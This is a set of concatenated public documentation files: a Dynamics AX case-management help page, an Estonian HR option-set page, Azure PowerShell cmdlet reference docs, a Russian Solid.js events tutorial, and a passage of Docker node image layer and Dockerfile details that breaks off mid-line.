6f60ed1d7f718bdfa98b75468e640c31215b9573
1,663
md
Markdown
dynamicsax2012-technet/add-details-to-a-case.md
RobinARH/DynamicsAX2012-technet
d0d0ef979705b68e6a8406736612e9fc3c74c871
[ "CC-BY-4.0", "MIT" ]
null
null
null
dynamicsax2012-technet/add-details-to-a-case.md
RobinARH/DynamicsAX2012-technet
d0d0ef979705b68e6a8406736612e9fc3c74c871
[ "CC-BY-4.0", "MIT" ]
null
null
null
dynamicsax2012-technet/add-details-to-a-case.md
RobinARH/DynamicsAX2012-technet
d0d0ef979705b68e6a8406736612e9fc3c74c871
[ "CC-BY-4.0", "MIT" ]
null
null
null
--- title: Add details to a case TOCTitle: Add details to a case ms:assetid: ed8a7326-8378-4270-bccc-35d38b1b9355 ms:mtpsurl: https://technet.microsoft.com/en-us/library/Hh227501(v=AX.60) ms:contentKeyID: 36059905 ms.date: 04/18/2014 mtps_version: v=AX.60 audience: Application User ms.search.region: Global --- # Add details to a case _**Applies To:** Microsoft Dynamics AX 2012 R3, Microsoft Dynamics AX 2012 R2, Microsoft Dynamics AX 2012 Feature Pack, Microsoft Dynamics AX 2012_ After you create a case, you can add activities, dependent cases, associations, case log information, documents, and responsibilities to the case. You can add these details when you first create the case or you can add them later as needed. 1. Click **Home** \> **Common** \> **Cases** \> **All cases**. 2. Double-click the case that you want to update. 3. Select the tab that corresponds to the information that you want to add to the case. Use the following information to complete this task: - **Case log** tab – Click **Add** to create a new case log information line and enter the appropriate information. Click **Details** to open the **Source type** form to view source types for lead and opportunity records. - **Associations** tab – Click **Add** to create a new line and add information about an entity that is associated with the case that you are currently working on. - **Knowledge article** tab – Click **Add** to add knowledge article information to the case. Click **Details** to open the **Knowledge article** form. ## See also [Create a case](create-a-case.md) [Case management](case-management.md)
38.674419
240
0.726398
eng_Latn
0.972696
6f611cfbd2571a7c55bce0f4b7b38e4518a6daa7
1,477
md
Markdown
articles/human-resources/hr-admin-integration-ats-api-gender.md
MicrosoftDocs/Dynamics-365-Operations.et-ee
dc7d4df9666186a929909ca4d7f4ca8b41df301d
[ "CC-BY-4.0", "MIT" ]
2
2020-05-18T17:13:59.000Z
2021-04-20T21:13:45.000Z
articles/human-resources/hr-admin-integration-ats-api-gender.md
MicrosoftDocs/Dynamics-365-Operations.et-ee
dc7d4df9666186a929909ca4d7f4ca8b41df301d
[ "CC-BY-4.0", "MIT" ]
7
2017-12-08T15:04:50.000Z
2019-04-30T11:45:50.000Z
articles/human-resources/hr-admin-integration-ats-api-gender.md
MicrosoftDocs/Dynamics-365-Operations.et-ee
dc7d4df9666186a929909ca4d7f4ca8b41df301d
[ "CC-BY-4.0", "MIT" ]
null
null
null
--- title: Sugu description: Selles teemas kirjeldatakse rakenduse Dynamics 365 Human Resources suvandikomplekti Sugu. author: jaredha ms.date: 02/05/2021 ms.topic: article ms.prod: '' ms.technology: '' audience: Application User ms.custom: '' ms.assetid: '' ms.search.region: Global ms.author: jaredha ms.search.validFrom: 2021-02-05 ms.dyn365.ops.version: Human Resources ms.openlocfilehash: 4fa74ef1b4f6f2cc11051abda76d9edd8539b2659c1700f7aa34c3e5359bd394 ms.sourcegitcommit: 42fe9790ddf0bdad911544deaa82123a396712fb ms.translationtype: HT ms.contentlocale: et-EE ms.lasthandoff: 08/05/2021 ms.locfileid: "6721627" --- # <a name="gender"></a>Sugu [!include [Applies to Human Resources](../includes/applies-to-hr.md)] Selles teemas kirjeldatakse rakenduse Dynamics 365 Human Resources suvandikomplekti Sugu. Füüsiline nimi: mshr_hcmpersongender See loetelu annab kandidaadi soo suvandikomplekti. See on saadaval suvandikomplektis mshr_hcmpersongender. | Väärtus | Silt | Kirjeldus | | --- | --- | --- | | 200000000 | None | Sugu pole määratud. | | 200000001 | Mees | Mees. | | 200000002 | Naine | Naine. | | 200000003 | NonSpecific | Mittespetsiifilise soo valik. | ## <a name="see-also"></a>Vt ka [Kandidaadi jälgimissüsteemi integreerimise API tutvustus](hr-admin-integration-ats-api-introduction.md)<br> [Palgatava kandidaadi päringu näidis](hr-admin-integration-ats-api-candidate-to-hire-example-query.md) [!INCLUDE[footer-include](../includes/footer-banner.md)]
32.108696
108
0.77522
est_Latn
0.806286
6f617c81c0dc15f27004d418a3d1f9c337ec2522
5,552
md
Markdown
azps-3.2.0/Az.DataShare/Remove-AzDataShareSynchronizationSetting.md
vladimirf7/azure-docs-powershell
3ff03c91cee2b137f85eded1db721b46c118e413
[ "CC-BY-4.0", "MIT" ]
2
2020-07-18T09:52:49.000Z
2021-07-20T20:07:58.000Z
azps-3.2.0/Az.DataShare/Remove-AzDataShareSynchronizationSetting.md
vladimirf7/azure-docs-powershell
3ff03c91cee2b137f85eded1db721b46c118e413
[ "CC-BY-4.0", "MIT" ]
59
2018-08-16T07:17:59.000Z
2020-10-28T07:14:21.000Z
azps-3.2.0/Az.DataShare/Remove-AzDataShareSynchronizationSetting.md
vladimirf7/azure-docs-powershell
3ff03c91cee2b137f85eded1db721b46c118e413
[ "CC-BY-4.0", "MIT" ]
1
2021-05-18T04:39:18.000Z
2021-05-18T04:39:18.000Z
--- external help file: Microsoft.Azure.PowerShell.Cmdlets.DataShare.dll-Help.xml Module Name: Az.DataShare online version: https://docs.microsoft.com/en-us/powershell/module/az.datashare/remove-azdatasharesynchronizationsetting schema: 2.0.0 content_git_url: https://github.com/Azure/azure-powershell/blob/master/src/DataShare/DataShare/help/Remove-AzDataShareSynchronizationSetting.md original_content_git_url: https://github.com/Azure/azure-powershell/blob/master/src/DataShare/DataShare/help/Remove-AzDataShareSynchronizationSetting.md --- # Remove-AzDataShareSynchronizationSetting ## SYNOPSIS removes a synchronization setting ## SYNTAX ### ByFieldsParameterSet (Default) ``` Remove-AzDataShareSynchronizationSetting -ResourceGroupName <String> -AccountName <String> -ShareName <String> -Name <String> [-PassThru] [-AsJob] [-DefaultProfile <IAzureContextContainer>] [-WhatIf] [-Confirm] [<CommonParameters>] ``` ### ByResourceIdParameterSet ``` Remove-AzDataShareSynchronizationSetting -ResourceId <String> [-PassThru] [-AsJob] [-DefaultProfile <IAzureContextContainer>] [-WhatIf] [-Confirm] [<CommonParameters>] ``` ### ByObjectParameterSet ``` Remove-AzDataShareSynchronizationSetting -InputObject <PSDataShareSynchronizationSetting> [-PassThru] [-AsJob] [-DefaultProfile <IAzureContextContainer>] [-WhatIf] [-Confirm] [<CommonParameters>] ``` ## DESCRIPTION The **Remove-AzDataShareSynchronizationSetting** cmdlet removes a datashare synchronization setting ## EXAMPLES ### Example 1 ``` PS C:\> Remove-AzDataShareSynchronizationSetting -ResourceGroupName "ADS" -AccountName "WikiAds" -ShareName "AdsShare" -Name "AdsShareSynchronizationSetting" Are you sure you want to remove synchronization-setting "AdsShareSynchronizationSetting"? [Y] Yes [N] No [S] Suspend [?] Help (default is "Y"): Y ``` This commands removes a synchronization setting named AdsShareSynchronizationSetting from share AdsShare. ## PARAMETERS ### -AccountName Azure Data Share Account name ```yaml Type: System.String Parameter Sets: ByFieldsParameterSet Aliases: Required: True Position: Named Default value: None Accept pipeline input: False Accept wildcard characters: False ``` ### -AsJob {{Fill AsJob Description}} ```yaml Type: System.Management.Automation.SwitchParameter Parameter Sets: (All) Aliases: Required: False Position: Named Default value: None Accept pipeline input: False Accept wildcard characters: False ``` ### -DefaultProfile The credentials, account, tenant, and subscription used for communication with Azure. ```yaml Type: Microsoft.Azure.Commands.Common.Authentication.Abstractions.Core.IAzureContextContainer Parameter Sets: (All) Aliases: AzContext, AzureRmContext, AzureCredential Required: False Position: Named Default value: None Accept pipeline input: False Accept wildcard characters: False ``` ### -InputObject The Azure Data Share Synchronization setting. ```yaml Type: Microsoft.Azure.PowerShell.Cmdlets.DataShare.Models.PSDataShareSynchronizationSetting Parameter Sets: ByObjectParameterSet Aliases: Required: True Position: Named Default value: None Accept pipeline input: True (ByValue) Accept wildcard characters: False ``` ### -Name Synchronization setting name ```yaml Type: System.String Parameter Sets: ByFieldsParameterSet Aliases: Required: True Position: Named Default value: None Accept pipeline input: False Accept wildcard characters: False ``` ### -PassThru Return object (if specified). ```yaml Type: System.Management.Automation.SwitchParameter Parameter Sets: (All) Aliases: Required: False Position: Named Default value: None Accept pipeline input: False Accept wildcard characters: False ``` ### -ResourceGroupName The resource group name of the azure data share account ```yaml Type: System.String Parameter Sets: ByFieldsParameterSet Aliases: Required: True Position: Named Default value: None Accept pipeline input: False Accept wildcard characters: False ``` ### -ResourceId The resource id of the synchronization setting ```yaml Type: System.String Parameter Sets: ByResourceIdParameterSet Aliases: Required: True Position: Named Default value: None Accept pipeline input: True (ByPropertyName) Accept wildcard characters: False ``` ### -ShareName Azure data share name ```yaml Type: System.String Parameter Sets: ByFieldsParameterSet Aliases: Required: True Position: Named Default value: None Accept pipeline input: False Accept wildcard characters: False ``` ### -Confirm Prompts you for confirmation before running the cmdlet. ```yaml Type: System.Management.Automation.SwitchParameter Parameter Sets: (All) Aliases: cf Required: False Position: Named Default value: None Accept pipeline input: False Accept wildcard characters: False ``` ### -WhatIf Shows what would happen if the cmdlet runs. The cmdlet is not run. ```yaml Type: System.Management.Automation.SwitchParameter Parameter Sets: (All) Aliases: wi Required: False Position: Named Default value: None Accept pipeline input: False Accept wildcard characters: False ``` ### CommonParameters This cmdlet supports the common parameters: -Debug, -ErrorAction, -ErrorVariable, -InformationAction, -InformationVariable, -OutVariable, -OutBuffer, -PipelineVariable, -Verbose, -WarningAction, and -WarningVariable. For more information, see about_CommonParameters (http://go.microsoft.com/fwlink/?LinkID=113216). ## INPUTS ### System.String ### Microsoft.Azure.PowerShell.Cmdlets.DataShare.Models.PSDataShareSynchronizationSetting ## OUTPUTS ### System.Boolean ## NOTES ## RELATED LINKS
23.525424
314
0.790526
yue_Hant
0.651353
6f618e2be87c1de95c937af84e5f7bfa1d1178b9
1,486
md
Markdown
langs/ru/tutorials/bindings_events/lesson.md
cheasea/solid-docs
0db4ddd731e689d4d16e82923d65c2b8319bedff
[ "MIT" ]
51
2021-07-18T22:31:35.000Z
2022-03-23T00:43:10.000Z
langs/ru/tutorials/bindings_events/lesson.md
cheasea/solid-docs
0db4ddd731e689d4d16e82923d65c2b8319bedff
[ "MIT" ]
67
2021-07-19T15:32:40.000Z
2022-03-28T07:46:43.000Z
langs/ru/tutorials/bindings_events/lesson.md
cheasea/solid-docs
0db4ddd731e689d4d16e82923d65c2b8319bedff
[ "MIT" ]
49
2021-07-19T15:46:21.000Z
2022-03-19T15:55:31.000Z
События в Solid это атрибуты с префиксом `on`. Они являются особенными в своем поведении. Во-первых, они не включаются в реактивные обертки. Во многих случаях очень тяжело объяснить разницу между `Сигналом` и слушателем события (`event handler`). В случае с событиями они вызываются и им не нужна реактивность они прикрепляются (`bound`) только единожды. Вы всегда можете сделать так, чтобы ваш слушатель выполнял различные операции, в зависимости от текущего состояния вашего приложения. Стандартные UI события (которые всплывают и композируются (`composed`)) автоматически делегируются документу. Для улучшения перформанса при делегации Solid поддерживает синтаксис в виде массива, чтобы вызывать слушателя без создания дополнительных замыканий (`closures`): ```jsx const handler = (data, event) => /*...*/ <button onClick={[handler, data]}>Click Me</button> ``` Например, давайте прикрепим слушатель на событие `mousemove`: ```jsx <div onMouseMove={handleMouseMove}> The mouse position is {pos().x} x {pos().y} </div> ``` Все `on` атрибуты не зависят от регистра, однако для сверки вы должны ориентироваться на названия с нижним регистром. Например, `onMouseMove` будет отслеживать событие `mousemove`. Если вам нужна поддержка других регистров или вы не хотите использовать делегацию событий, то вы можете использовать префикс `on:` чтобы использовать названия событий после двоеточия: ```jsx <button on:DOMContentLoaded={() => /* Любое действие */} >Click Me</button> ```
61.916667
488
0.777254
rus_Cyrl
0.992228
6f61d25296f3fcf78853a19e33ce47ef63e3a080
34,240
md
Markdown
repos/node/remote/12.20-alpine3.9.md
PaulinaParangerHr/repo-info
b2ca979c1177fad04b963a99bc49590bf390730f
[ "Apache-2.0" ]
null
null
null
repos/node/remote/12.20-alpine3.9.md
PaulinaParangerHr/repo-info
b2ca979c1177fad04b963a99bc49590bf390730f
[ "Apache-2.0" ]
null
null
null
repos/node/remote/12.20-alpine3.9.md
PaulinaParangerHr/repo-info
b2ca979c1177fad04b963a99bc49590bf390730f
[ "Apache-2.0" ]
null
null
null
## `node:12.20-alpine3.9` ```console $ docker pull node@sha256:16d40e6c2858ee41cc7e19bb36f8a92718ad935ceae036e88dcffb68041dea6c ``` - Manifest MIME: `application/vnd.docker.distribution.manifest.list.v2+json` - Platforms: - linux; amd64 - linux; arm variant v6 - linux; arm variant v7 - linux; arm64 variant v8 - linux; ppc64le - linux; s390x ### `node:12.20-alpine3.9` - linux; amd64 ```console $ docker pull node@sha256:ed9251aca55330890ef48a274c6ce03052e5438e87b6101b0bab5362ac79b5e5 ``` - Docker Version: 19.03.12 - Manifest MIME: `application/vnd.docker.distribution.manifest.v2+json` - Total Size: **29.5 MB (29503137 bytes)** (compressed transfer size, not on-disk size) - Image ID: `sha256:a7d6e4c06dd4f80d3ba52db58f3c7421f6c29497ddf084928103d71b6635314c` - Entrypoint: `["docker-entrypoint.sh"]` - Default Command: `["node"]` ```dockerfile # Fri, 24 Apr 2020 01:05:35 GMT ADD file:a0afd0b0db7f9ee9496186ead087ec00edd1386ea8c018557d15720053f7308e in / # Fri, 24 Apr 2020 01:05:35 GMT CMD ["/bin/sh"] # Tue, 05 Jan 2021 17:30:57 GMT ENV NODE_VERSION=12.20.1 # Tue, 05 Jan 2021 17:31:09 GMT RUN addgroup -g 1000 node && adduser -u 1000 -G node -s /bin/sh -D node && apk add --no-cache libstdc++ && apk add --no-cache --virtual .build-deps curl && ARCH= && alpineArch="$(apk --print-arch)" && case "${alpineArch##*-}" in x86_64) ARCH='x64' CHECKSUM="783fbfc85228418d0630b778214bdcea3a82d5c3ac13aefcc14e4a81e977d9c9" ;; *) ;; esac && if [ -n "${CHECKSUM}" ]; then set -eu; curl -fsSLO --compressed "https://unofficial-builds.nodejs.org/download/release/v$NODE_VERSION/node-v$NODE_VERSION-linux-$ARCH-musl.tar.xz"; echo "$CHECKSUM node-v$NODE_VERSION-linux-$ARCH-musl.tar.xz" | sha256sum -c - && tar -xJf "node-v$NODE_VERSION-linux-$ARCH-musl.tar.xz" -C /usr/local --strip-components=1 --no-same-owner && ln -s /usr/local/bin/node /usr/local/bin/nodejs; else echo "Building from source" && apk add --no-cache --virtual .build-deps-full binutils-gold g++ gcc gnupg libgcc linux-headers make python2 && for key in 4ED778F539E3634C779C87C6D7062848A1AB005C 94AE36675C464D64BAFA68DD7434390BDBE9B9C5 1C050899334244A8AF75E53792EF661D867B9DFA 71DCFD284A79C3B38668286BC97EC7A07EDE3FC1 8FCCA13FEF1D0C2E91008E09770F7A9A5AE15600 C4F0DFFF4E8C1A8236409D08E73BC641CC11F4C8 C82FA3AE1CBEDC6BE46B9360C43CEC45C17AB93C DD8F2338BAE7501E3DD5AC78C273792F7D83545D A48C2BEE680E841632CD4E44F07496B3EB3C1762 108F52B48DB57BB0CC439B2997B01419BD92F80A B9E2F5981AA6E0CD28160D9FF13993A75599653C ; do gpg --batch --keyserver hkp://p80.pool.sks-keyservers.net:80 --recv-keys "$key" || gpg --batch --keyserver hkp://ipv4.pool.sks-keyservers.net --recv-keys "$key" || gpg --batch --keyserver hkp://pgp.mit.edu:80 --recv-keys "$key" ; done && curl -fsSLO --compressed "https://nodejs.org/dist/v$NODE_VERSION/node-v$NODE_VERSION.tar.xz" && curl -fsSLO --compressed "https://nodejs.org/dist/v$NODE_VERSION/SHASUMS256.txt.asc" && gpg --batch --decrypt --output SHASUMS256.txt SHASUMS256.txt.asc && grep " node-v$NODE_VERSION.tar.xz\$" SHASUMS256.txt | sha256sum -c - && tar -xf "node-v$NODE_VERSION.tar.xz" && cd "node-v$NODE_VERSION" && ./configure && make -j$(getconf _NPROCESSORS_ONLN) V= && make install && apk del .build-deps-full && cd .. && rm -Rf "node-v$NODE_VERSION" && rm "node-v$NODE_VERSION.tar.xz" SHASUMS256.txt.asc SHASUMS256.txt; fi && rm -f "node-v$NODE_VERSION-linux-$ARCH-musl.tar.xz" && apk del .build-deps && node --version && npm --version # Tue, 05 Jan 2021 17:31:10 GMT ENV YARN_VERSION=1.22.5 # Tue, 05 Jan 2021 17:31:15 GMT RUN apk add --no-cache --virtual .build-deps-yarn curl gnupg tar && for key in 6A010C5166006599AA17F08146C2130DFD2497F5 ; do gpg --batch --keyserver hkp://p80.pool.sks-keyservers.net:80 --recv-keys "$key" || gpg --batch --keyserver hkp://ipv4.pool.sks-keyservers.net --recv-keys "$key" || gpg --batch --keyserver hkp://pgp.mit.edu:80 --recv-keys "$key" ; done && curl -fsSLO --compressed "https://yarnpkg.com/downloads/$YARN_VERSION/yarn-v$YARN_VERSION.tar.gz" && curl -fsSLO --compressed "https://yarnpkg.com/downloads/$YARN_VERSION/yarn-v$YARN_VERSION.tar.gz.asc" && gpg --batch --verify yarn-v$YARN_VERSION.tar.gz.asc yarn-v$YARN_VERSION.tar.gz && mkdir -p /opt && tar -xzf yarn-v$YARN_VERSION.tar.gz -C /opt/ && ln -s /opt/yarn-v$YARN_VERSION/bin/yarn /usr/local/bin/yarn && ln -s /opt/yarn-v$YARN_VERSION/bin/yarnpkg /usr/local/bin/yarnpkg && rm yarn-v$YARN_VERSION.tar.gz.asc yarn-v$YARN_VERSION.tar.gz && apk del .build-deps-yarn && yarn --version # Tue, 05 Jan 2021 17:31:15 GMT COPY file:238737301d47304174e4d24f4def935b29b3069c03c72ae8de97d94624382fce in /usr/local/bin/ # Tue, 05 Jan 2021 17:31:16 GMT ENTRYPOINT ["docker-entrypoint.sh"] # Tue, 05 Jan 2021 17:31:16 GMT CMD ["node"] ``` - Layers: - `sha256:31603596830fc7e56753139f9c2c6bd3759e48a850659506ebfb885d1cf3aef5` Last Modified: Fri, 24 Apr 2020 01:06:12 GMT Size: 2.8 MB (2773413 bytes) MIME: application/vnd.docker.image.rootfs.diff.tar.gzip - `sha256:f5b0d1ce6f59dcbee12d1ce6f4093fa9a7939c7751f00ff2137b4651dcf2de8f` Last Modified: Tue, 05 Jan 2021 17:48:53 GMT Size: 24.5 MB (24490884 bytes) MIME: application/vnd.docker.image.rootfs.diff.tar.gzip - `sha256:55922cf6f31687a003e818aab6c5e42db644b2be19a1c74040d750db3d63354c` Last Modified: Tue, 05 Jan 2021 17:48:48 GMT Size: 2.2 MB (2238557 bytes) MIME: application/vnd.docker.image.rootfs.diff.tar.gzip - `sha256:e8a7c0650cafa577c71ba40f4423d3486d700990904de11327a69bdff61d1a92` Last Modified: Tue, 05 Jan 2021 17:48:47 GMT Size: 283.0 B MIME: application/vnd.docker.image.rootfs.diff.tar.gzip ### `node:12.20-alpine3.9` - linux; arm variant v6 ```console $ docker pull node@sha256:14c5972c4890dc28f1ef2d0a36a3880f473f6442abd408c9c00c4bc785a19f1a ``` - Docker Version: 19.03.12 - Manifest MIME: `application/vnd.docker.distribution.manifest.v2+json` - Total Size: **28.8 MB (28796885 bytes)** (compressed transfer size, not on-disk size) - Image ID: `sha256:84df833a8691eaac8ee05dfa2d8c2f9d4397458f3f18aa26ad15ac01ee4f1436` - Entrypoint: `["docker-entrypoint.sh"]` - Default Command: `["node"]` ```dockerfile # Thu, 23 Apr 2020 15:51:44 GMT ADD file:7dd2657543fac7f63a125194d27bd38a8e472a3076831a2331c43a471794c210 in / # Thu, 23 Apr 2020 15:51:45 GMT CMD ["/bin/sh"] # Tue, 05 Jan 2021 18:58:29 GMT ENV NODE_VERSION=12.20.1 # Tue, 05 Jan 2021 19:10:34 GMT RUN addgroup -g 1000 node && adduser -u 1000 -G node -s /bin/sh -D node && apk add --no-cache libstdc++ && apk add --no-cache --virtual .build-deps curl && ARCH= && alpineArch="$(apk --print-arch)" && case "${alpineArch##*-}" in x86_64) ARCH='x64' CHECKSUM="783fbfc85228418d0630b778214bdcea3a82d5c3ac13aefcc14e4a81e977d9c9" ;; *) ;; esac && if [ -n "${CHECKSUM}" ]; then set -eu; curl -fsSLO --compressed "https://unofficial-builds.nodejs.org/download/release/v$NODE_VERSION/node-v$NODE_VERSION-linux-$ARCH-musl.tar.xz"; echo "$CHECKSUM node-v$NODE_VERSION-linux-$ARCH-musl.tar.xz" | sha256sum -c - && tar -xJf "node-v$NODE_VERSION-linux-$ARCH-musl.tar.xz" -C /usr/local --strip-components=1 --no-same-owner && ln -s /usr/local/bin/node /usr/local/bin/nodejs; else echo "Building from source" && apk add --no-cache --virtual .build-deps-full binutils-gold g++ gcc gnupg libgcc linux-headers make python2 && for key in 4ED778F539E3634C779C87C6D7062848A1AB005C 94AE36675C464D64BAFA68DD7434390BDBE9B9C5 1C050899334244A8AF75E53792EF661D867B9DFA 71DCFD284A79C3B38668286BC97EC7A07EDE3FC1 8FCCA13FEF1D0C2E91008E09770F7A9A5AE15600 C4F0DFFF4E8C1A8236409D08E73BC641CC11F4C8 C82FA3AE1CBEDC6BE46B9360C43CEC45C17AB93C DD8F2338BAE7501E3DD5AC78C273792F7D83545D A48C2BEE680E841632CD4E44F07496B3EB3C1762 108F52B48DB57BB0CC439B2997B01419BD92F80A B9E2F5981AA6E0CD28160D9FF13993A75599653C ; do gpg --batch --keyserver hkp://p80.pool.sks-keyservers.net:80 --recv-keys "$key" || gpg --batch --keyserver hkp://ipv4.pool.sks-keyservers.net --recv-keys "$key" || gpg --batch --keyserver hkp://pgp.mit.edu:80 --recv-keys "$key" ; done && curl -fsSLO --compressed "https://nodejs.org/dist/v$NODE_VERSION/node-v$NODE_VERSION.tar.xz" && curl -fsSLO --compressed "https://nodejs.org/dist/v$NODE_VERSION/SHASUMS256.txt.asc" && gpg --batch --decrypt --output SHASUMS256.txt SHASUMS256.txt.asc && grep " node-v$NODE_VERSION.tar.xz\$" SHASUMS256.txt | sha256sum -c - && tar -xf "node-v$NODE_VERSION.tar.xz" && cd "node-v$NODE_VERSION" && ./configure && make -j$(getconf _NPROCESSORS_ONLN) V= && make install && apk del .build-deps-full && cd .. && rm -Rf "node-v$NODE_VERSION" && rm "node-v$NODE_VERSION.tar.xz" SHASUMS256.txt.asc SHASUMS256.txt; fi && rm -f "node-v$NODE_VERSION-linux-$ARCH-musl.tar.xz" && apk del .build-deps && node --version && npm --version # Tue, 05 Jan 2021 19:10:35 GMT ENV YARN_VERSION=1.22.5 # Tue, 05 Jan 2021 19:10:42 GMT RUN apk add --no-cache --virtual .build-deps-yarn curl gnupg tar && for key in 6A010C5166006599AA17F08146C2130DFD2497F5 ; do gpg --batch --keyserver hkp://p80.pool.sks-keyservers.net:80 --recv-keys "$key" || gpg --batch --keyserver hkp://ipv4.pool.sks-keyservers.net --recv-keys "$key" || gpg --batch --keyserver hkp://pgp.mit.edu:80 --recv-keys "$key" ; done && curl -fsSLO --compressed "https://yarnpkg.com/downloads/$YARN_VERSION/yarn-v$YARN_VERSION.tar.gz" && curl -fsSLO --compressed "https://yarnpkg.com/downloads/$YARN_VERSION/yarn-v$YARN_VERSION.tar.gz.asc" && gpg --batch --verify yarn-v$YARN_VERSION.tar.gz.asc yarn-v$YARN_VERSION.tar.gz && mkdir -p /opt && tar -xzf yarn-v$YARN_VERSION.tar.gz -C /opt/ && ln -s /opt/yarn-v$YARN_VERSION/bin/yarn /usr/local/bin/yarn && ln -s /opt/yarn-v$YARN_VERSION/bin/yarnpkg /usr/local/bin/yarnpkg && rm yarn-v$YARN_VERSION.tar.gz.asc yarn-v$YARN_VERSION.tar.gz && apk del .build-deps-yarn && yarn --version # Tue, 05 Jan 2021 19:10:43 GMT COPY file:238737301d47304174e4d24f4def935b29b3069c03c72ae8de97d94624382fce in /usr/local/bin/ # Tue, 05 Jan 2021 19:10:43 GMT ENTRYPOINT ["docker-entrypoint.sh"] # Tue, 05 Jan 2021 19:10:44 GMT CMD ["node"] ``` - Layers: - `sha256:27da80392aebe463671b839837d59af1261218364b4261ceb2eca0f814075270` Last Modified: Thu, 23 Apr 2020 15:52:21 GMT Size: 2.5 MB (2548725 bytes) MIME: application/vnd.docker.image.rootfs.diff.tar.gzip - `sha256:d06dd7b9d4c628e6d26b0be6a8c91e35766a77fd4f32fb8116a8d4a048184fd8` Last Modified: Tue, 05 Jan 2021 19:38:02 GMT Size: 24.0 MB (23957475 bytes) MIME: application/vnd.docker.image.rootfs.diff.tar.gzip - `sha256:1fa53b3bcf9984526fc9aa3de4e141a1e610376335001c24178ff1493c50f4e5` Last Modified: Tue, 05 Jan 2021 19:37:51 GMT Size: 2.3 MB (2290404 bytes) MIME: application/vnd.docker.image.rootfs.diff.tar.gzip - `sha256:ef482270beeddc6c4d2a61351004c191b6e4d37f71c51f7ef72804da4bd14d2f` Last Modified: Tue, 05 Jan 2021 19:37:51 GMT Size: 281.0 B MIME: application/vnd.docker.image.rootfs.diff.tar.gzip ### `node:12.20-alpine3.9` - linux; arm variant v7 ```console $ docker pull node@sha256:a5b3cac6ecc882616fa7e54263b0a8be40b2bcdf077e3889e75534cd008077fd ``` - Docker Version: 19.03.12 - Manifest MIME: `application/vnd.docker.distribution.manifest.v2+json` - Total Size: **28.2 MB (28182437 bytes)** (compressed transfer size, not on-disk size) - Image ID: `sha256:6f34f16820985558ae574b1167649e6a09c21becfe91d50f056052ec4198548e` - Entrypoint: `["docker-entrypoint.sh"]` - Default Command: `["node"]` ```dockerfile # Thu, 23 Apr 2020 22:04:56 GMT ADD file:5cfee90da24e94bf9a1c0f2ba8e03667ab5be058c265cc072bd60517c5e37eb4 in / # Thu, 23 Apr 2020 22:04:58 GMT CMD ["/bin/sh"] # Tue, 05 Jan 2021 19:12:04 GMT ENV NODE_VERSION=12.20.1 # Tue, 05 Jan 2021 19:21:15 GMT RUN addgroup -g 1000 node && adduser -u 1000 -G node -s /bin/sh -D node && apk add --no-cache libstdc++ && apk add --no-cache --virtual .build-deps curl && ARCH= && alpineArch="$(apk --print-arch)" && case "${alpineArch##*-}" in x86_64) ARCH='x64' CHECKSUM="783fbfc85228418d0630b778214bdcea3a82d5c3ac13aefcc14e4a81e977d9c9" ;; *) ;; esac && if [ -n "${CHECKSUM}" ]; then set -eu; curl -fsSLO --compressed "https://unofficial-builds.nodejs.org/download/release/v$NODE_VERSION/node-v$NODE_VERSION-linux-$ARCH-musl.tar.xz"; echo "$CHECKSUM node-v$NODE_VERSION-linux-$ARCH-musl.tar.xz" | sha256sum -c - && tar -xJf "node-v$NODE_VERSION-linux-$ARCH-musl.tar.xz" -C /usr/local --strip-components=1 --no-same-owner && ln -s /usr/local/bin/node /usr/local/bin/nodejs; else echo "Building from source" && apk add --no-cache --virtual .build-deps-full binutils-gold g++ gcc gnupg libgcc linux-headers make python2 && for key in 4ED778F539E3634C779C87C6D7062848A1AB005C 94AE36675C464D64BAFA68DD7434390BDBE9B9C5 1C050899334244A8AF75E53792EF661D867B9DFA 71DCFD284A79C3B38668286BC97EC7A07EDE3FC1 8FCCA13FEF1D0C2E91008E09770F7A9A5AE15600 C4F0DFFF4E8C1A8236409D08E73BC641CC11F4C8 C82FA3AE1CBEDC6BE46B9360C43CEC45C17AB93C DD8F2338BAE7501E3DD5AC78C273792F7D83545D A48C2BEE680E841632CD4E44F07496B3EB3C1762 108F52B48DB57BB0CC439B2997B01419BD92F80A B9E2F5981AA6E0CD28160D9FF13993A75599653C ; do gpg --batch --keyserver hkp://p80.pool.sks-keyservers.net:80 --recv-keys "$key" || gpg --batch --keyserver hkp://ipv4.pool.sks-keyservers.net --recv-keys "$key" || gpg --batch --keyserver hkp://pgp.mit.edu:80 --recv-keys "$key" ; done && curl -fsSLO --compressed "https://nodejs.org/dist/v$NODE_VERSION/node-v$NODE_VERSION.tar.xz" && curl -fsSLO --compressed "https://nodejs.org/dist/v$NODE_VERSION/SHASUMS256.txt.asc" && gpg --batch --decrypt --output SHASUMS256.txt SHASUMS256.txt.asc && grep " node-v$NODE_VERSION.tar.xz\$" SHASUMS256.txt | sha256sum -c - && tar -xf "node-v$NODE_VERSION.tar.xz" && cd "node-v$NODE_VERSION" && ./configure && make -j$(getconf _NPROCESSORS_ONLN) V= && make install && apk del .build-deps-full && cd .. && rm -Rf "node-v$NODE_VERSION" && rm "node-v$NODE_VERSION.tar.xz" SHASUMS256.txt.asc SHASUMS256.txt; fi && rm -f "node-v$NODE_VERSION-linux-$ARCH-musl.tar.xz" && apk del .build-deps && node --version && npm --version # Tue, 05 Jan 2021 19:21:16 GMT ENV YARN_VERSION=1.22.5 # Tue, 05 Jan 2021 19:21:22 GMT RUN apk add --no-cache --virtual .build-deps-yarn curl gnupg tar && for key in 6A010C5166006599AA17F08146C2130DFD2497F5 ; do gpg --batch --keyserver hkp://p80.pool.sks-keyservers.net:80 --recv-keys "$key" || gpg --batch --keyserver hkp://ipv4.pool.sks-keyservers.net --recv-keys "$key" || gpg --batch --keyserver hkp://pgp.mit.edu:80 --recv-keys "$key" ; done && curl -fsSLO --compressed "https://yarnpkg.com/downloads/$YARN_VERSION/yarn-v$YARN_VERSION.tar.gz" && curl -fsSLO --compressed "https://yarnpkg.com/downloads/$YARN_VERSION/yarn-v$YARN_VERSION.tar.gz.asc" && gpg --batch --verify yarn-v$YARN_VERSION.tar.gz.asc yarn-v$YARN_VERSION.tar.gz && mkdir -p /opt && tar -xzf yarn-v$YARN_VERSION.tar.gz -C /opt/ && ln -s /opt/yarn-v$YARN_VERSION/bin/yarn /usr/local/bin/yarn && ln -s /opt/yarn-v$YARN_VERSION/bin/yarnpkg /usr/local/bin/yarnpkg && rm yarn-v$YARN_VERSION.tar.gz.asc yarn-v$YARN_VERSION.tar.gz && apk del .build-deps-yarn && yarn --version # Tue, 05 Jan 2021 19:21:22 GMT COPY file:238737301d47304174e4d24f4def935b29b3069c03c72ae8de97d94624382fce in 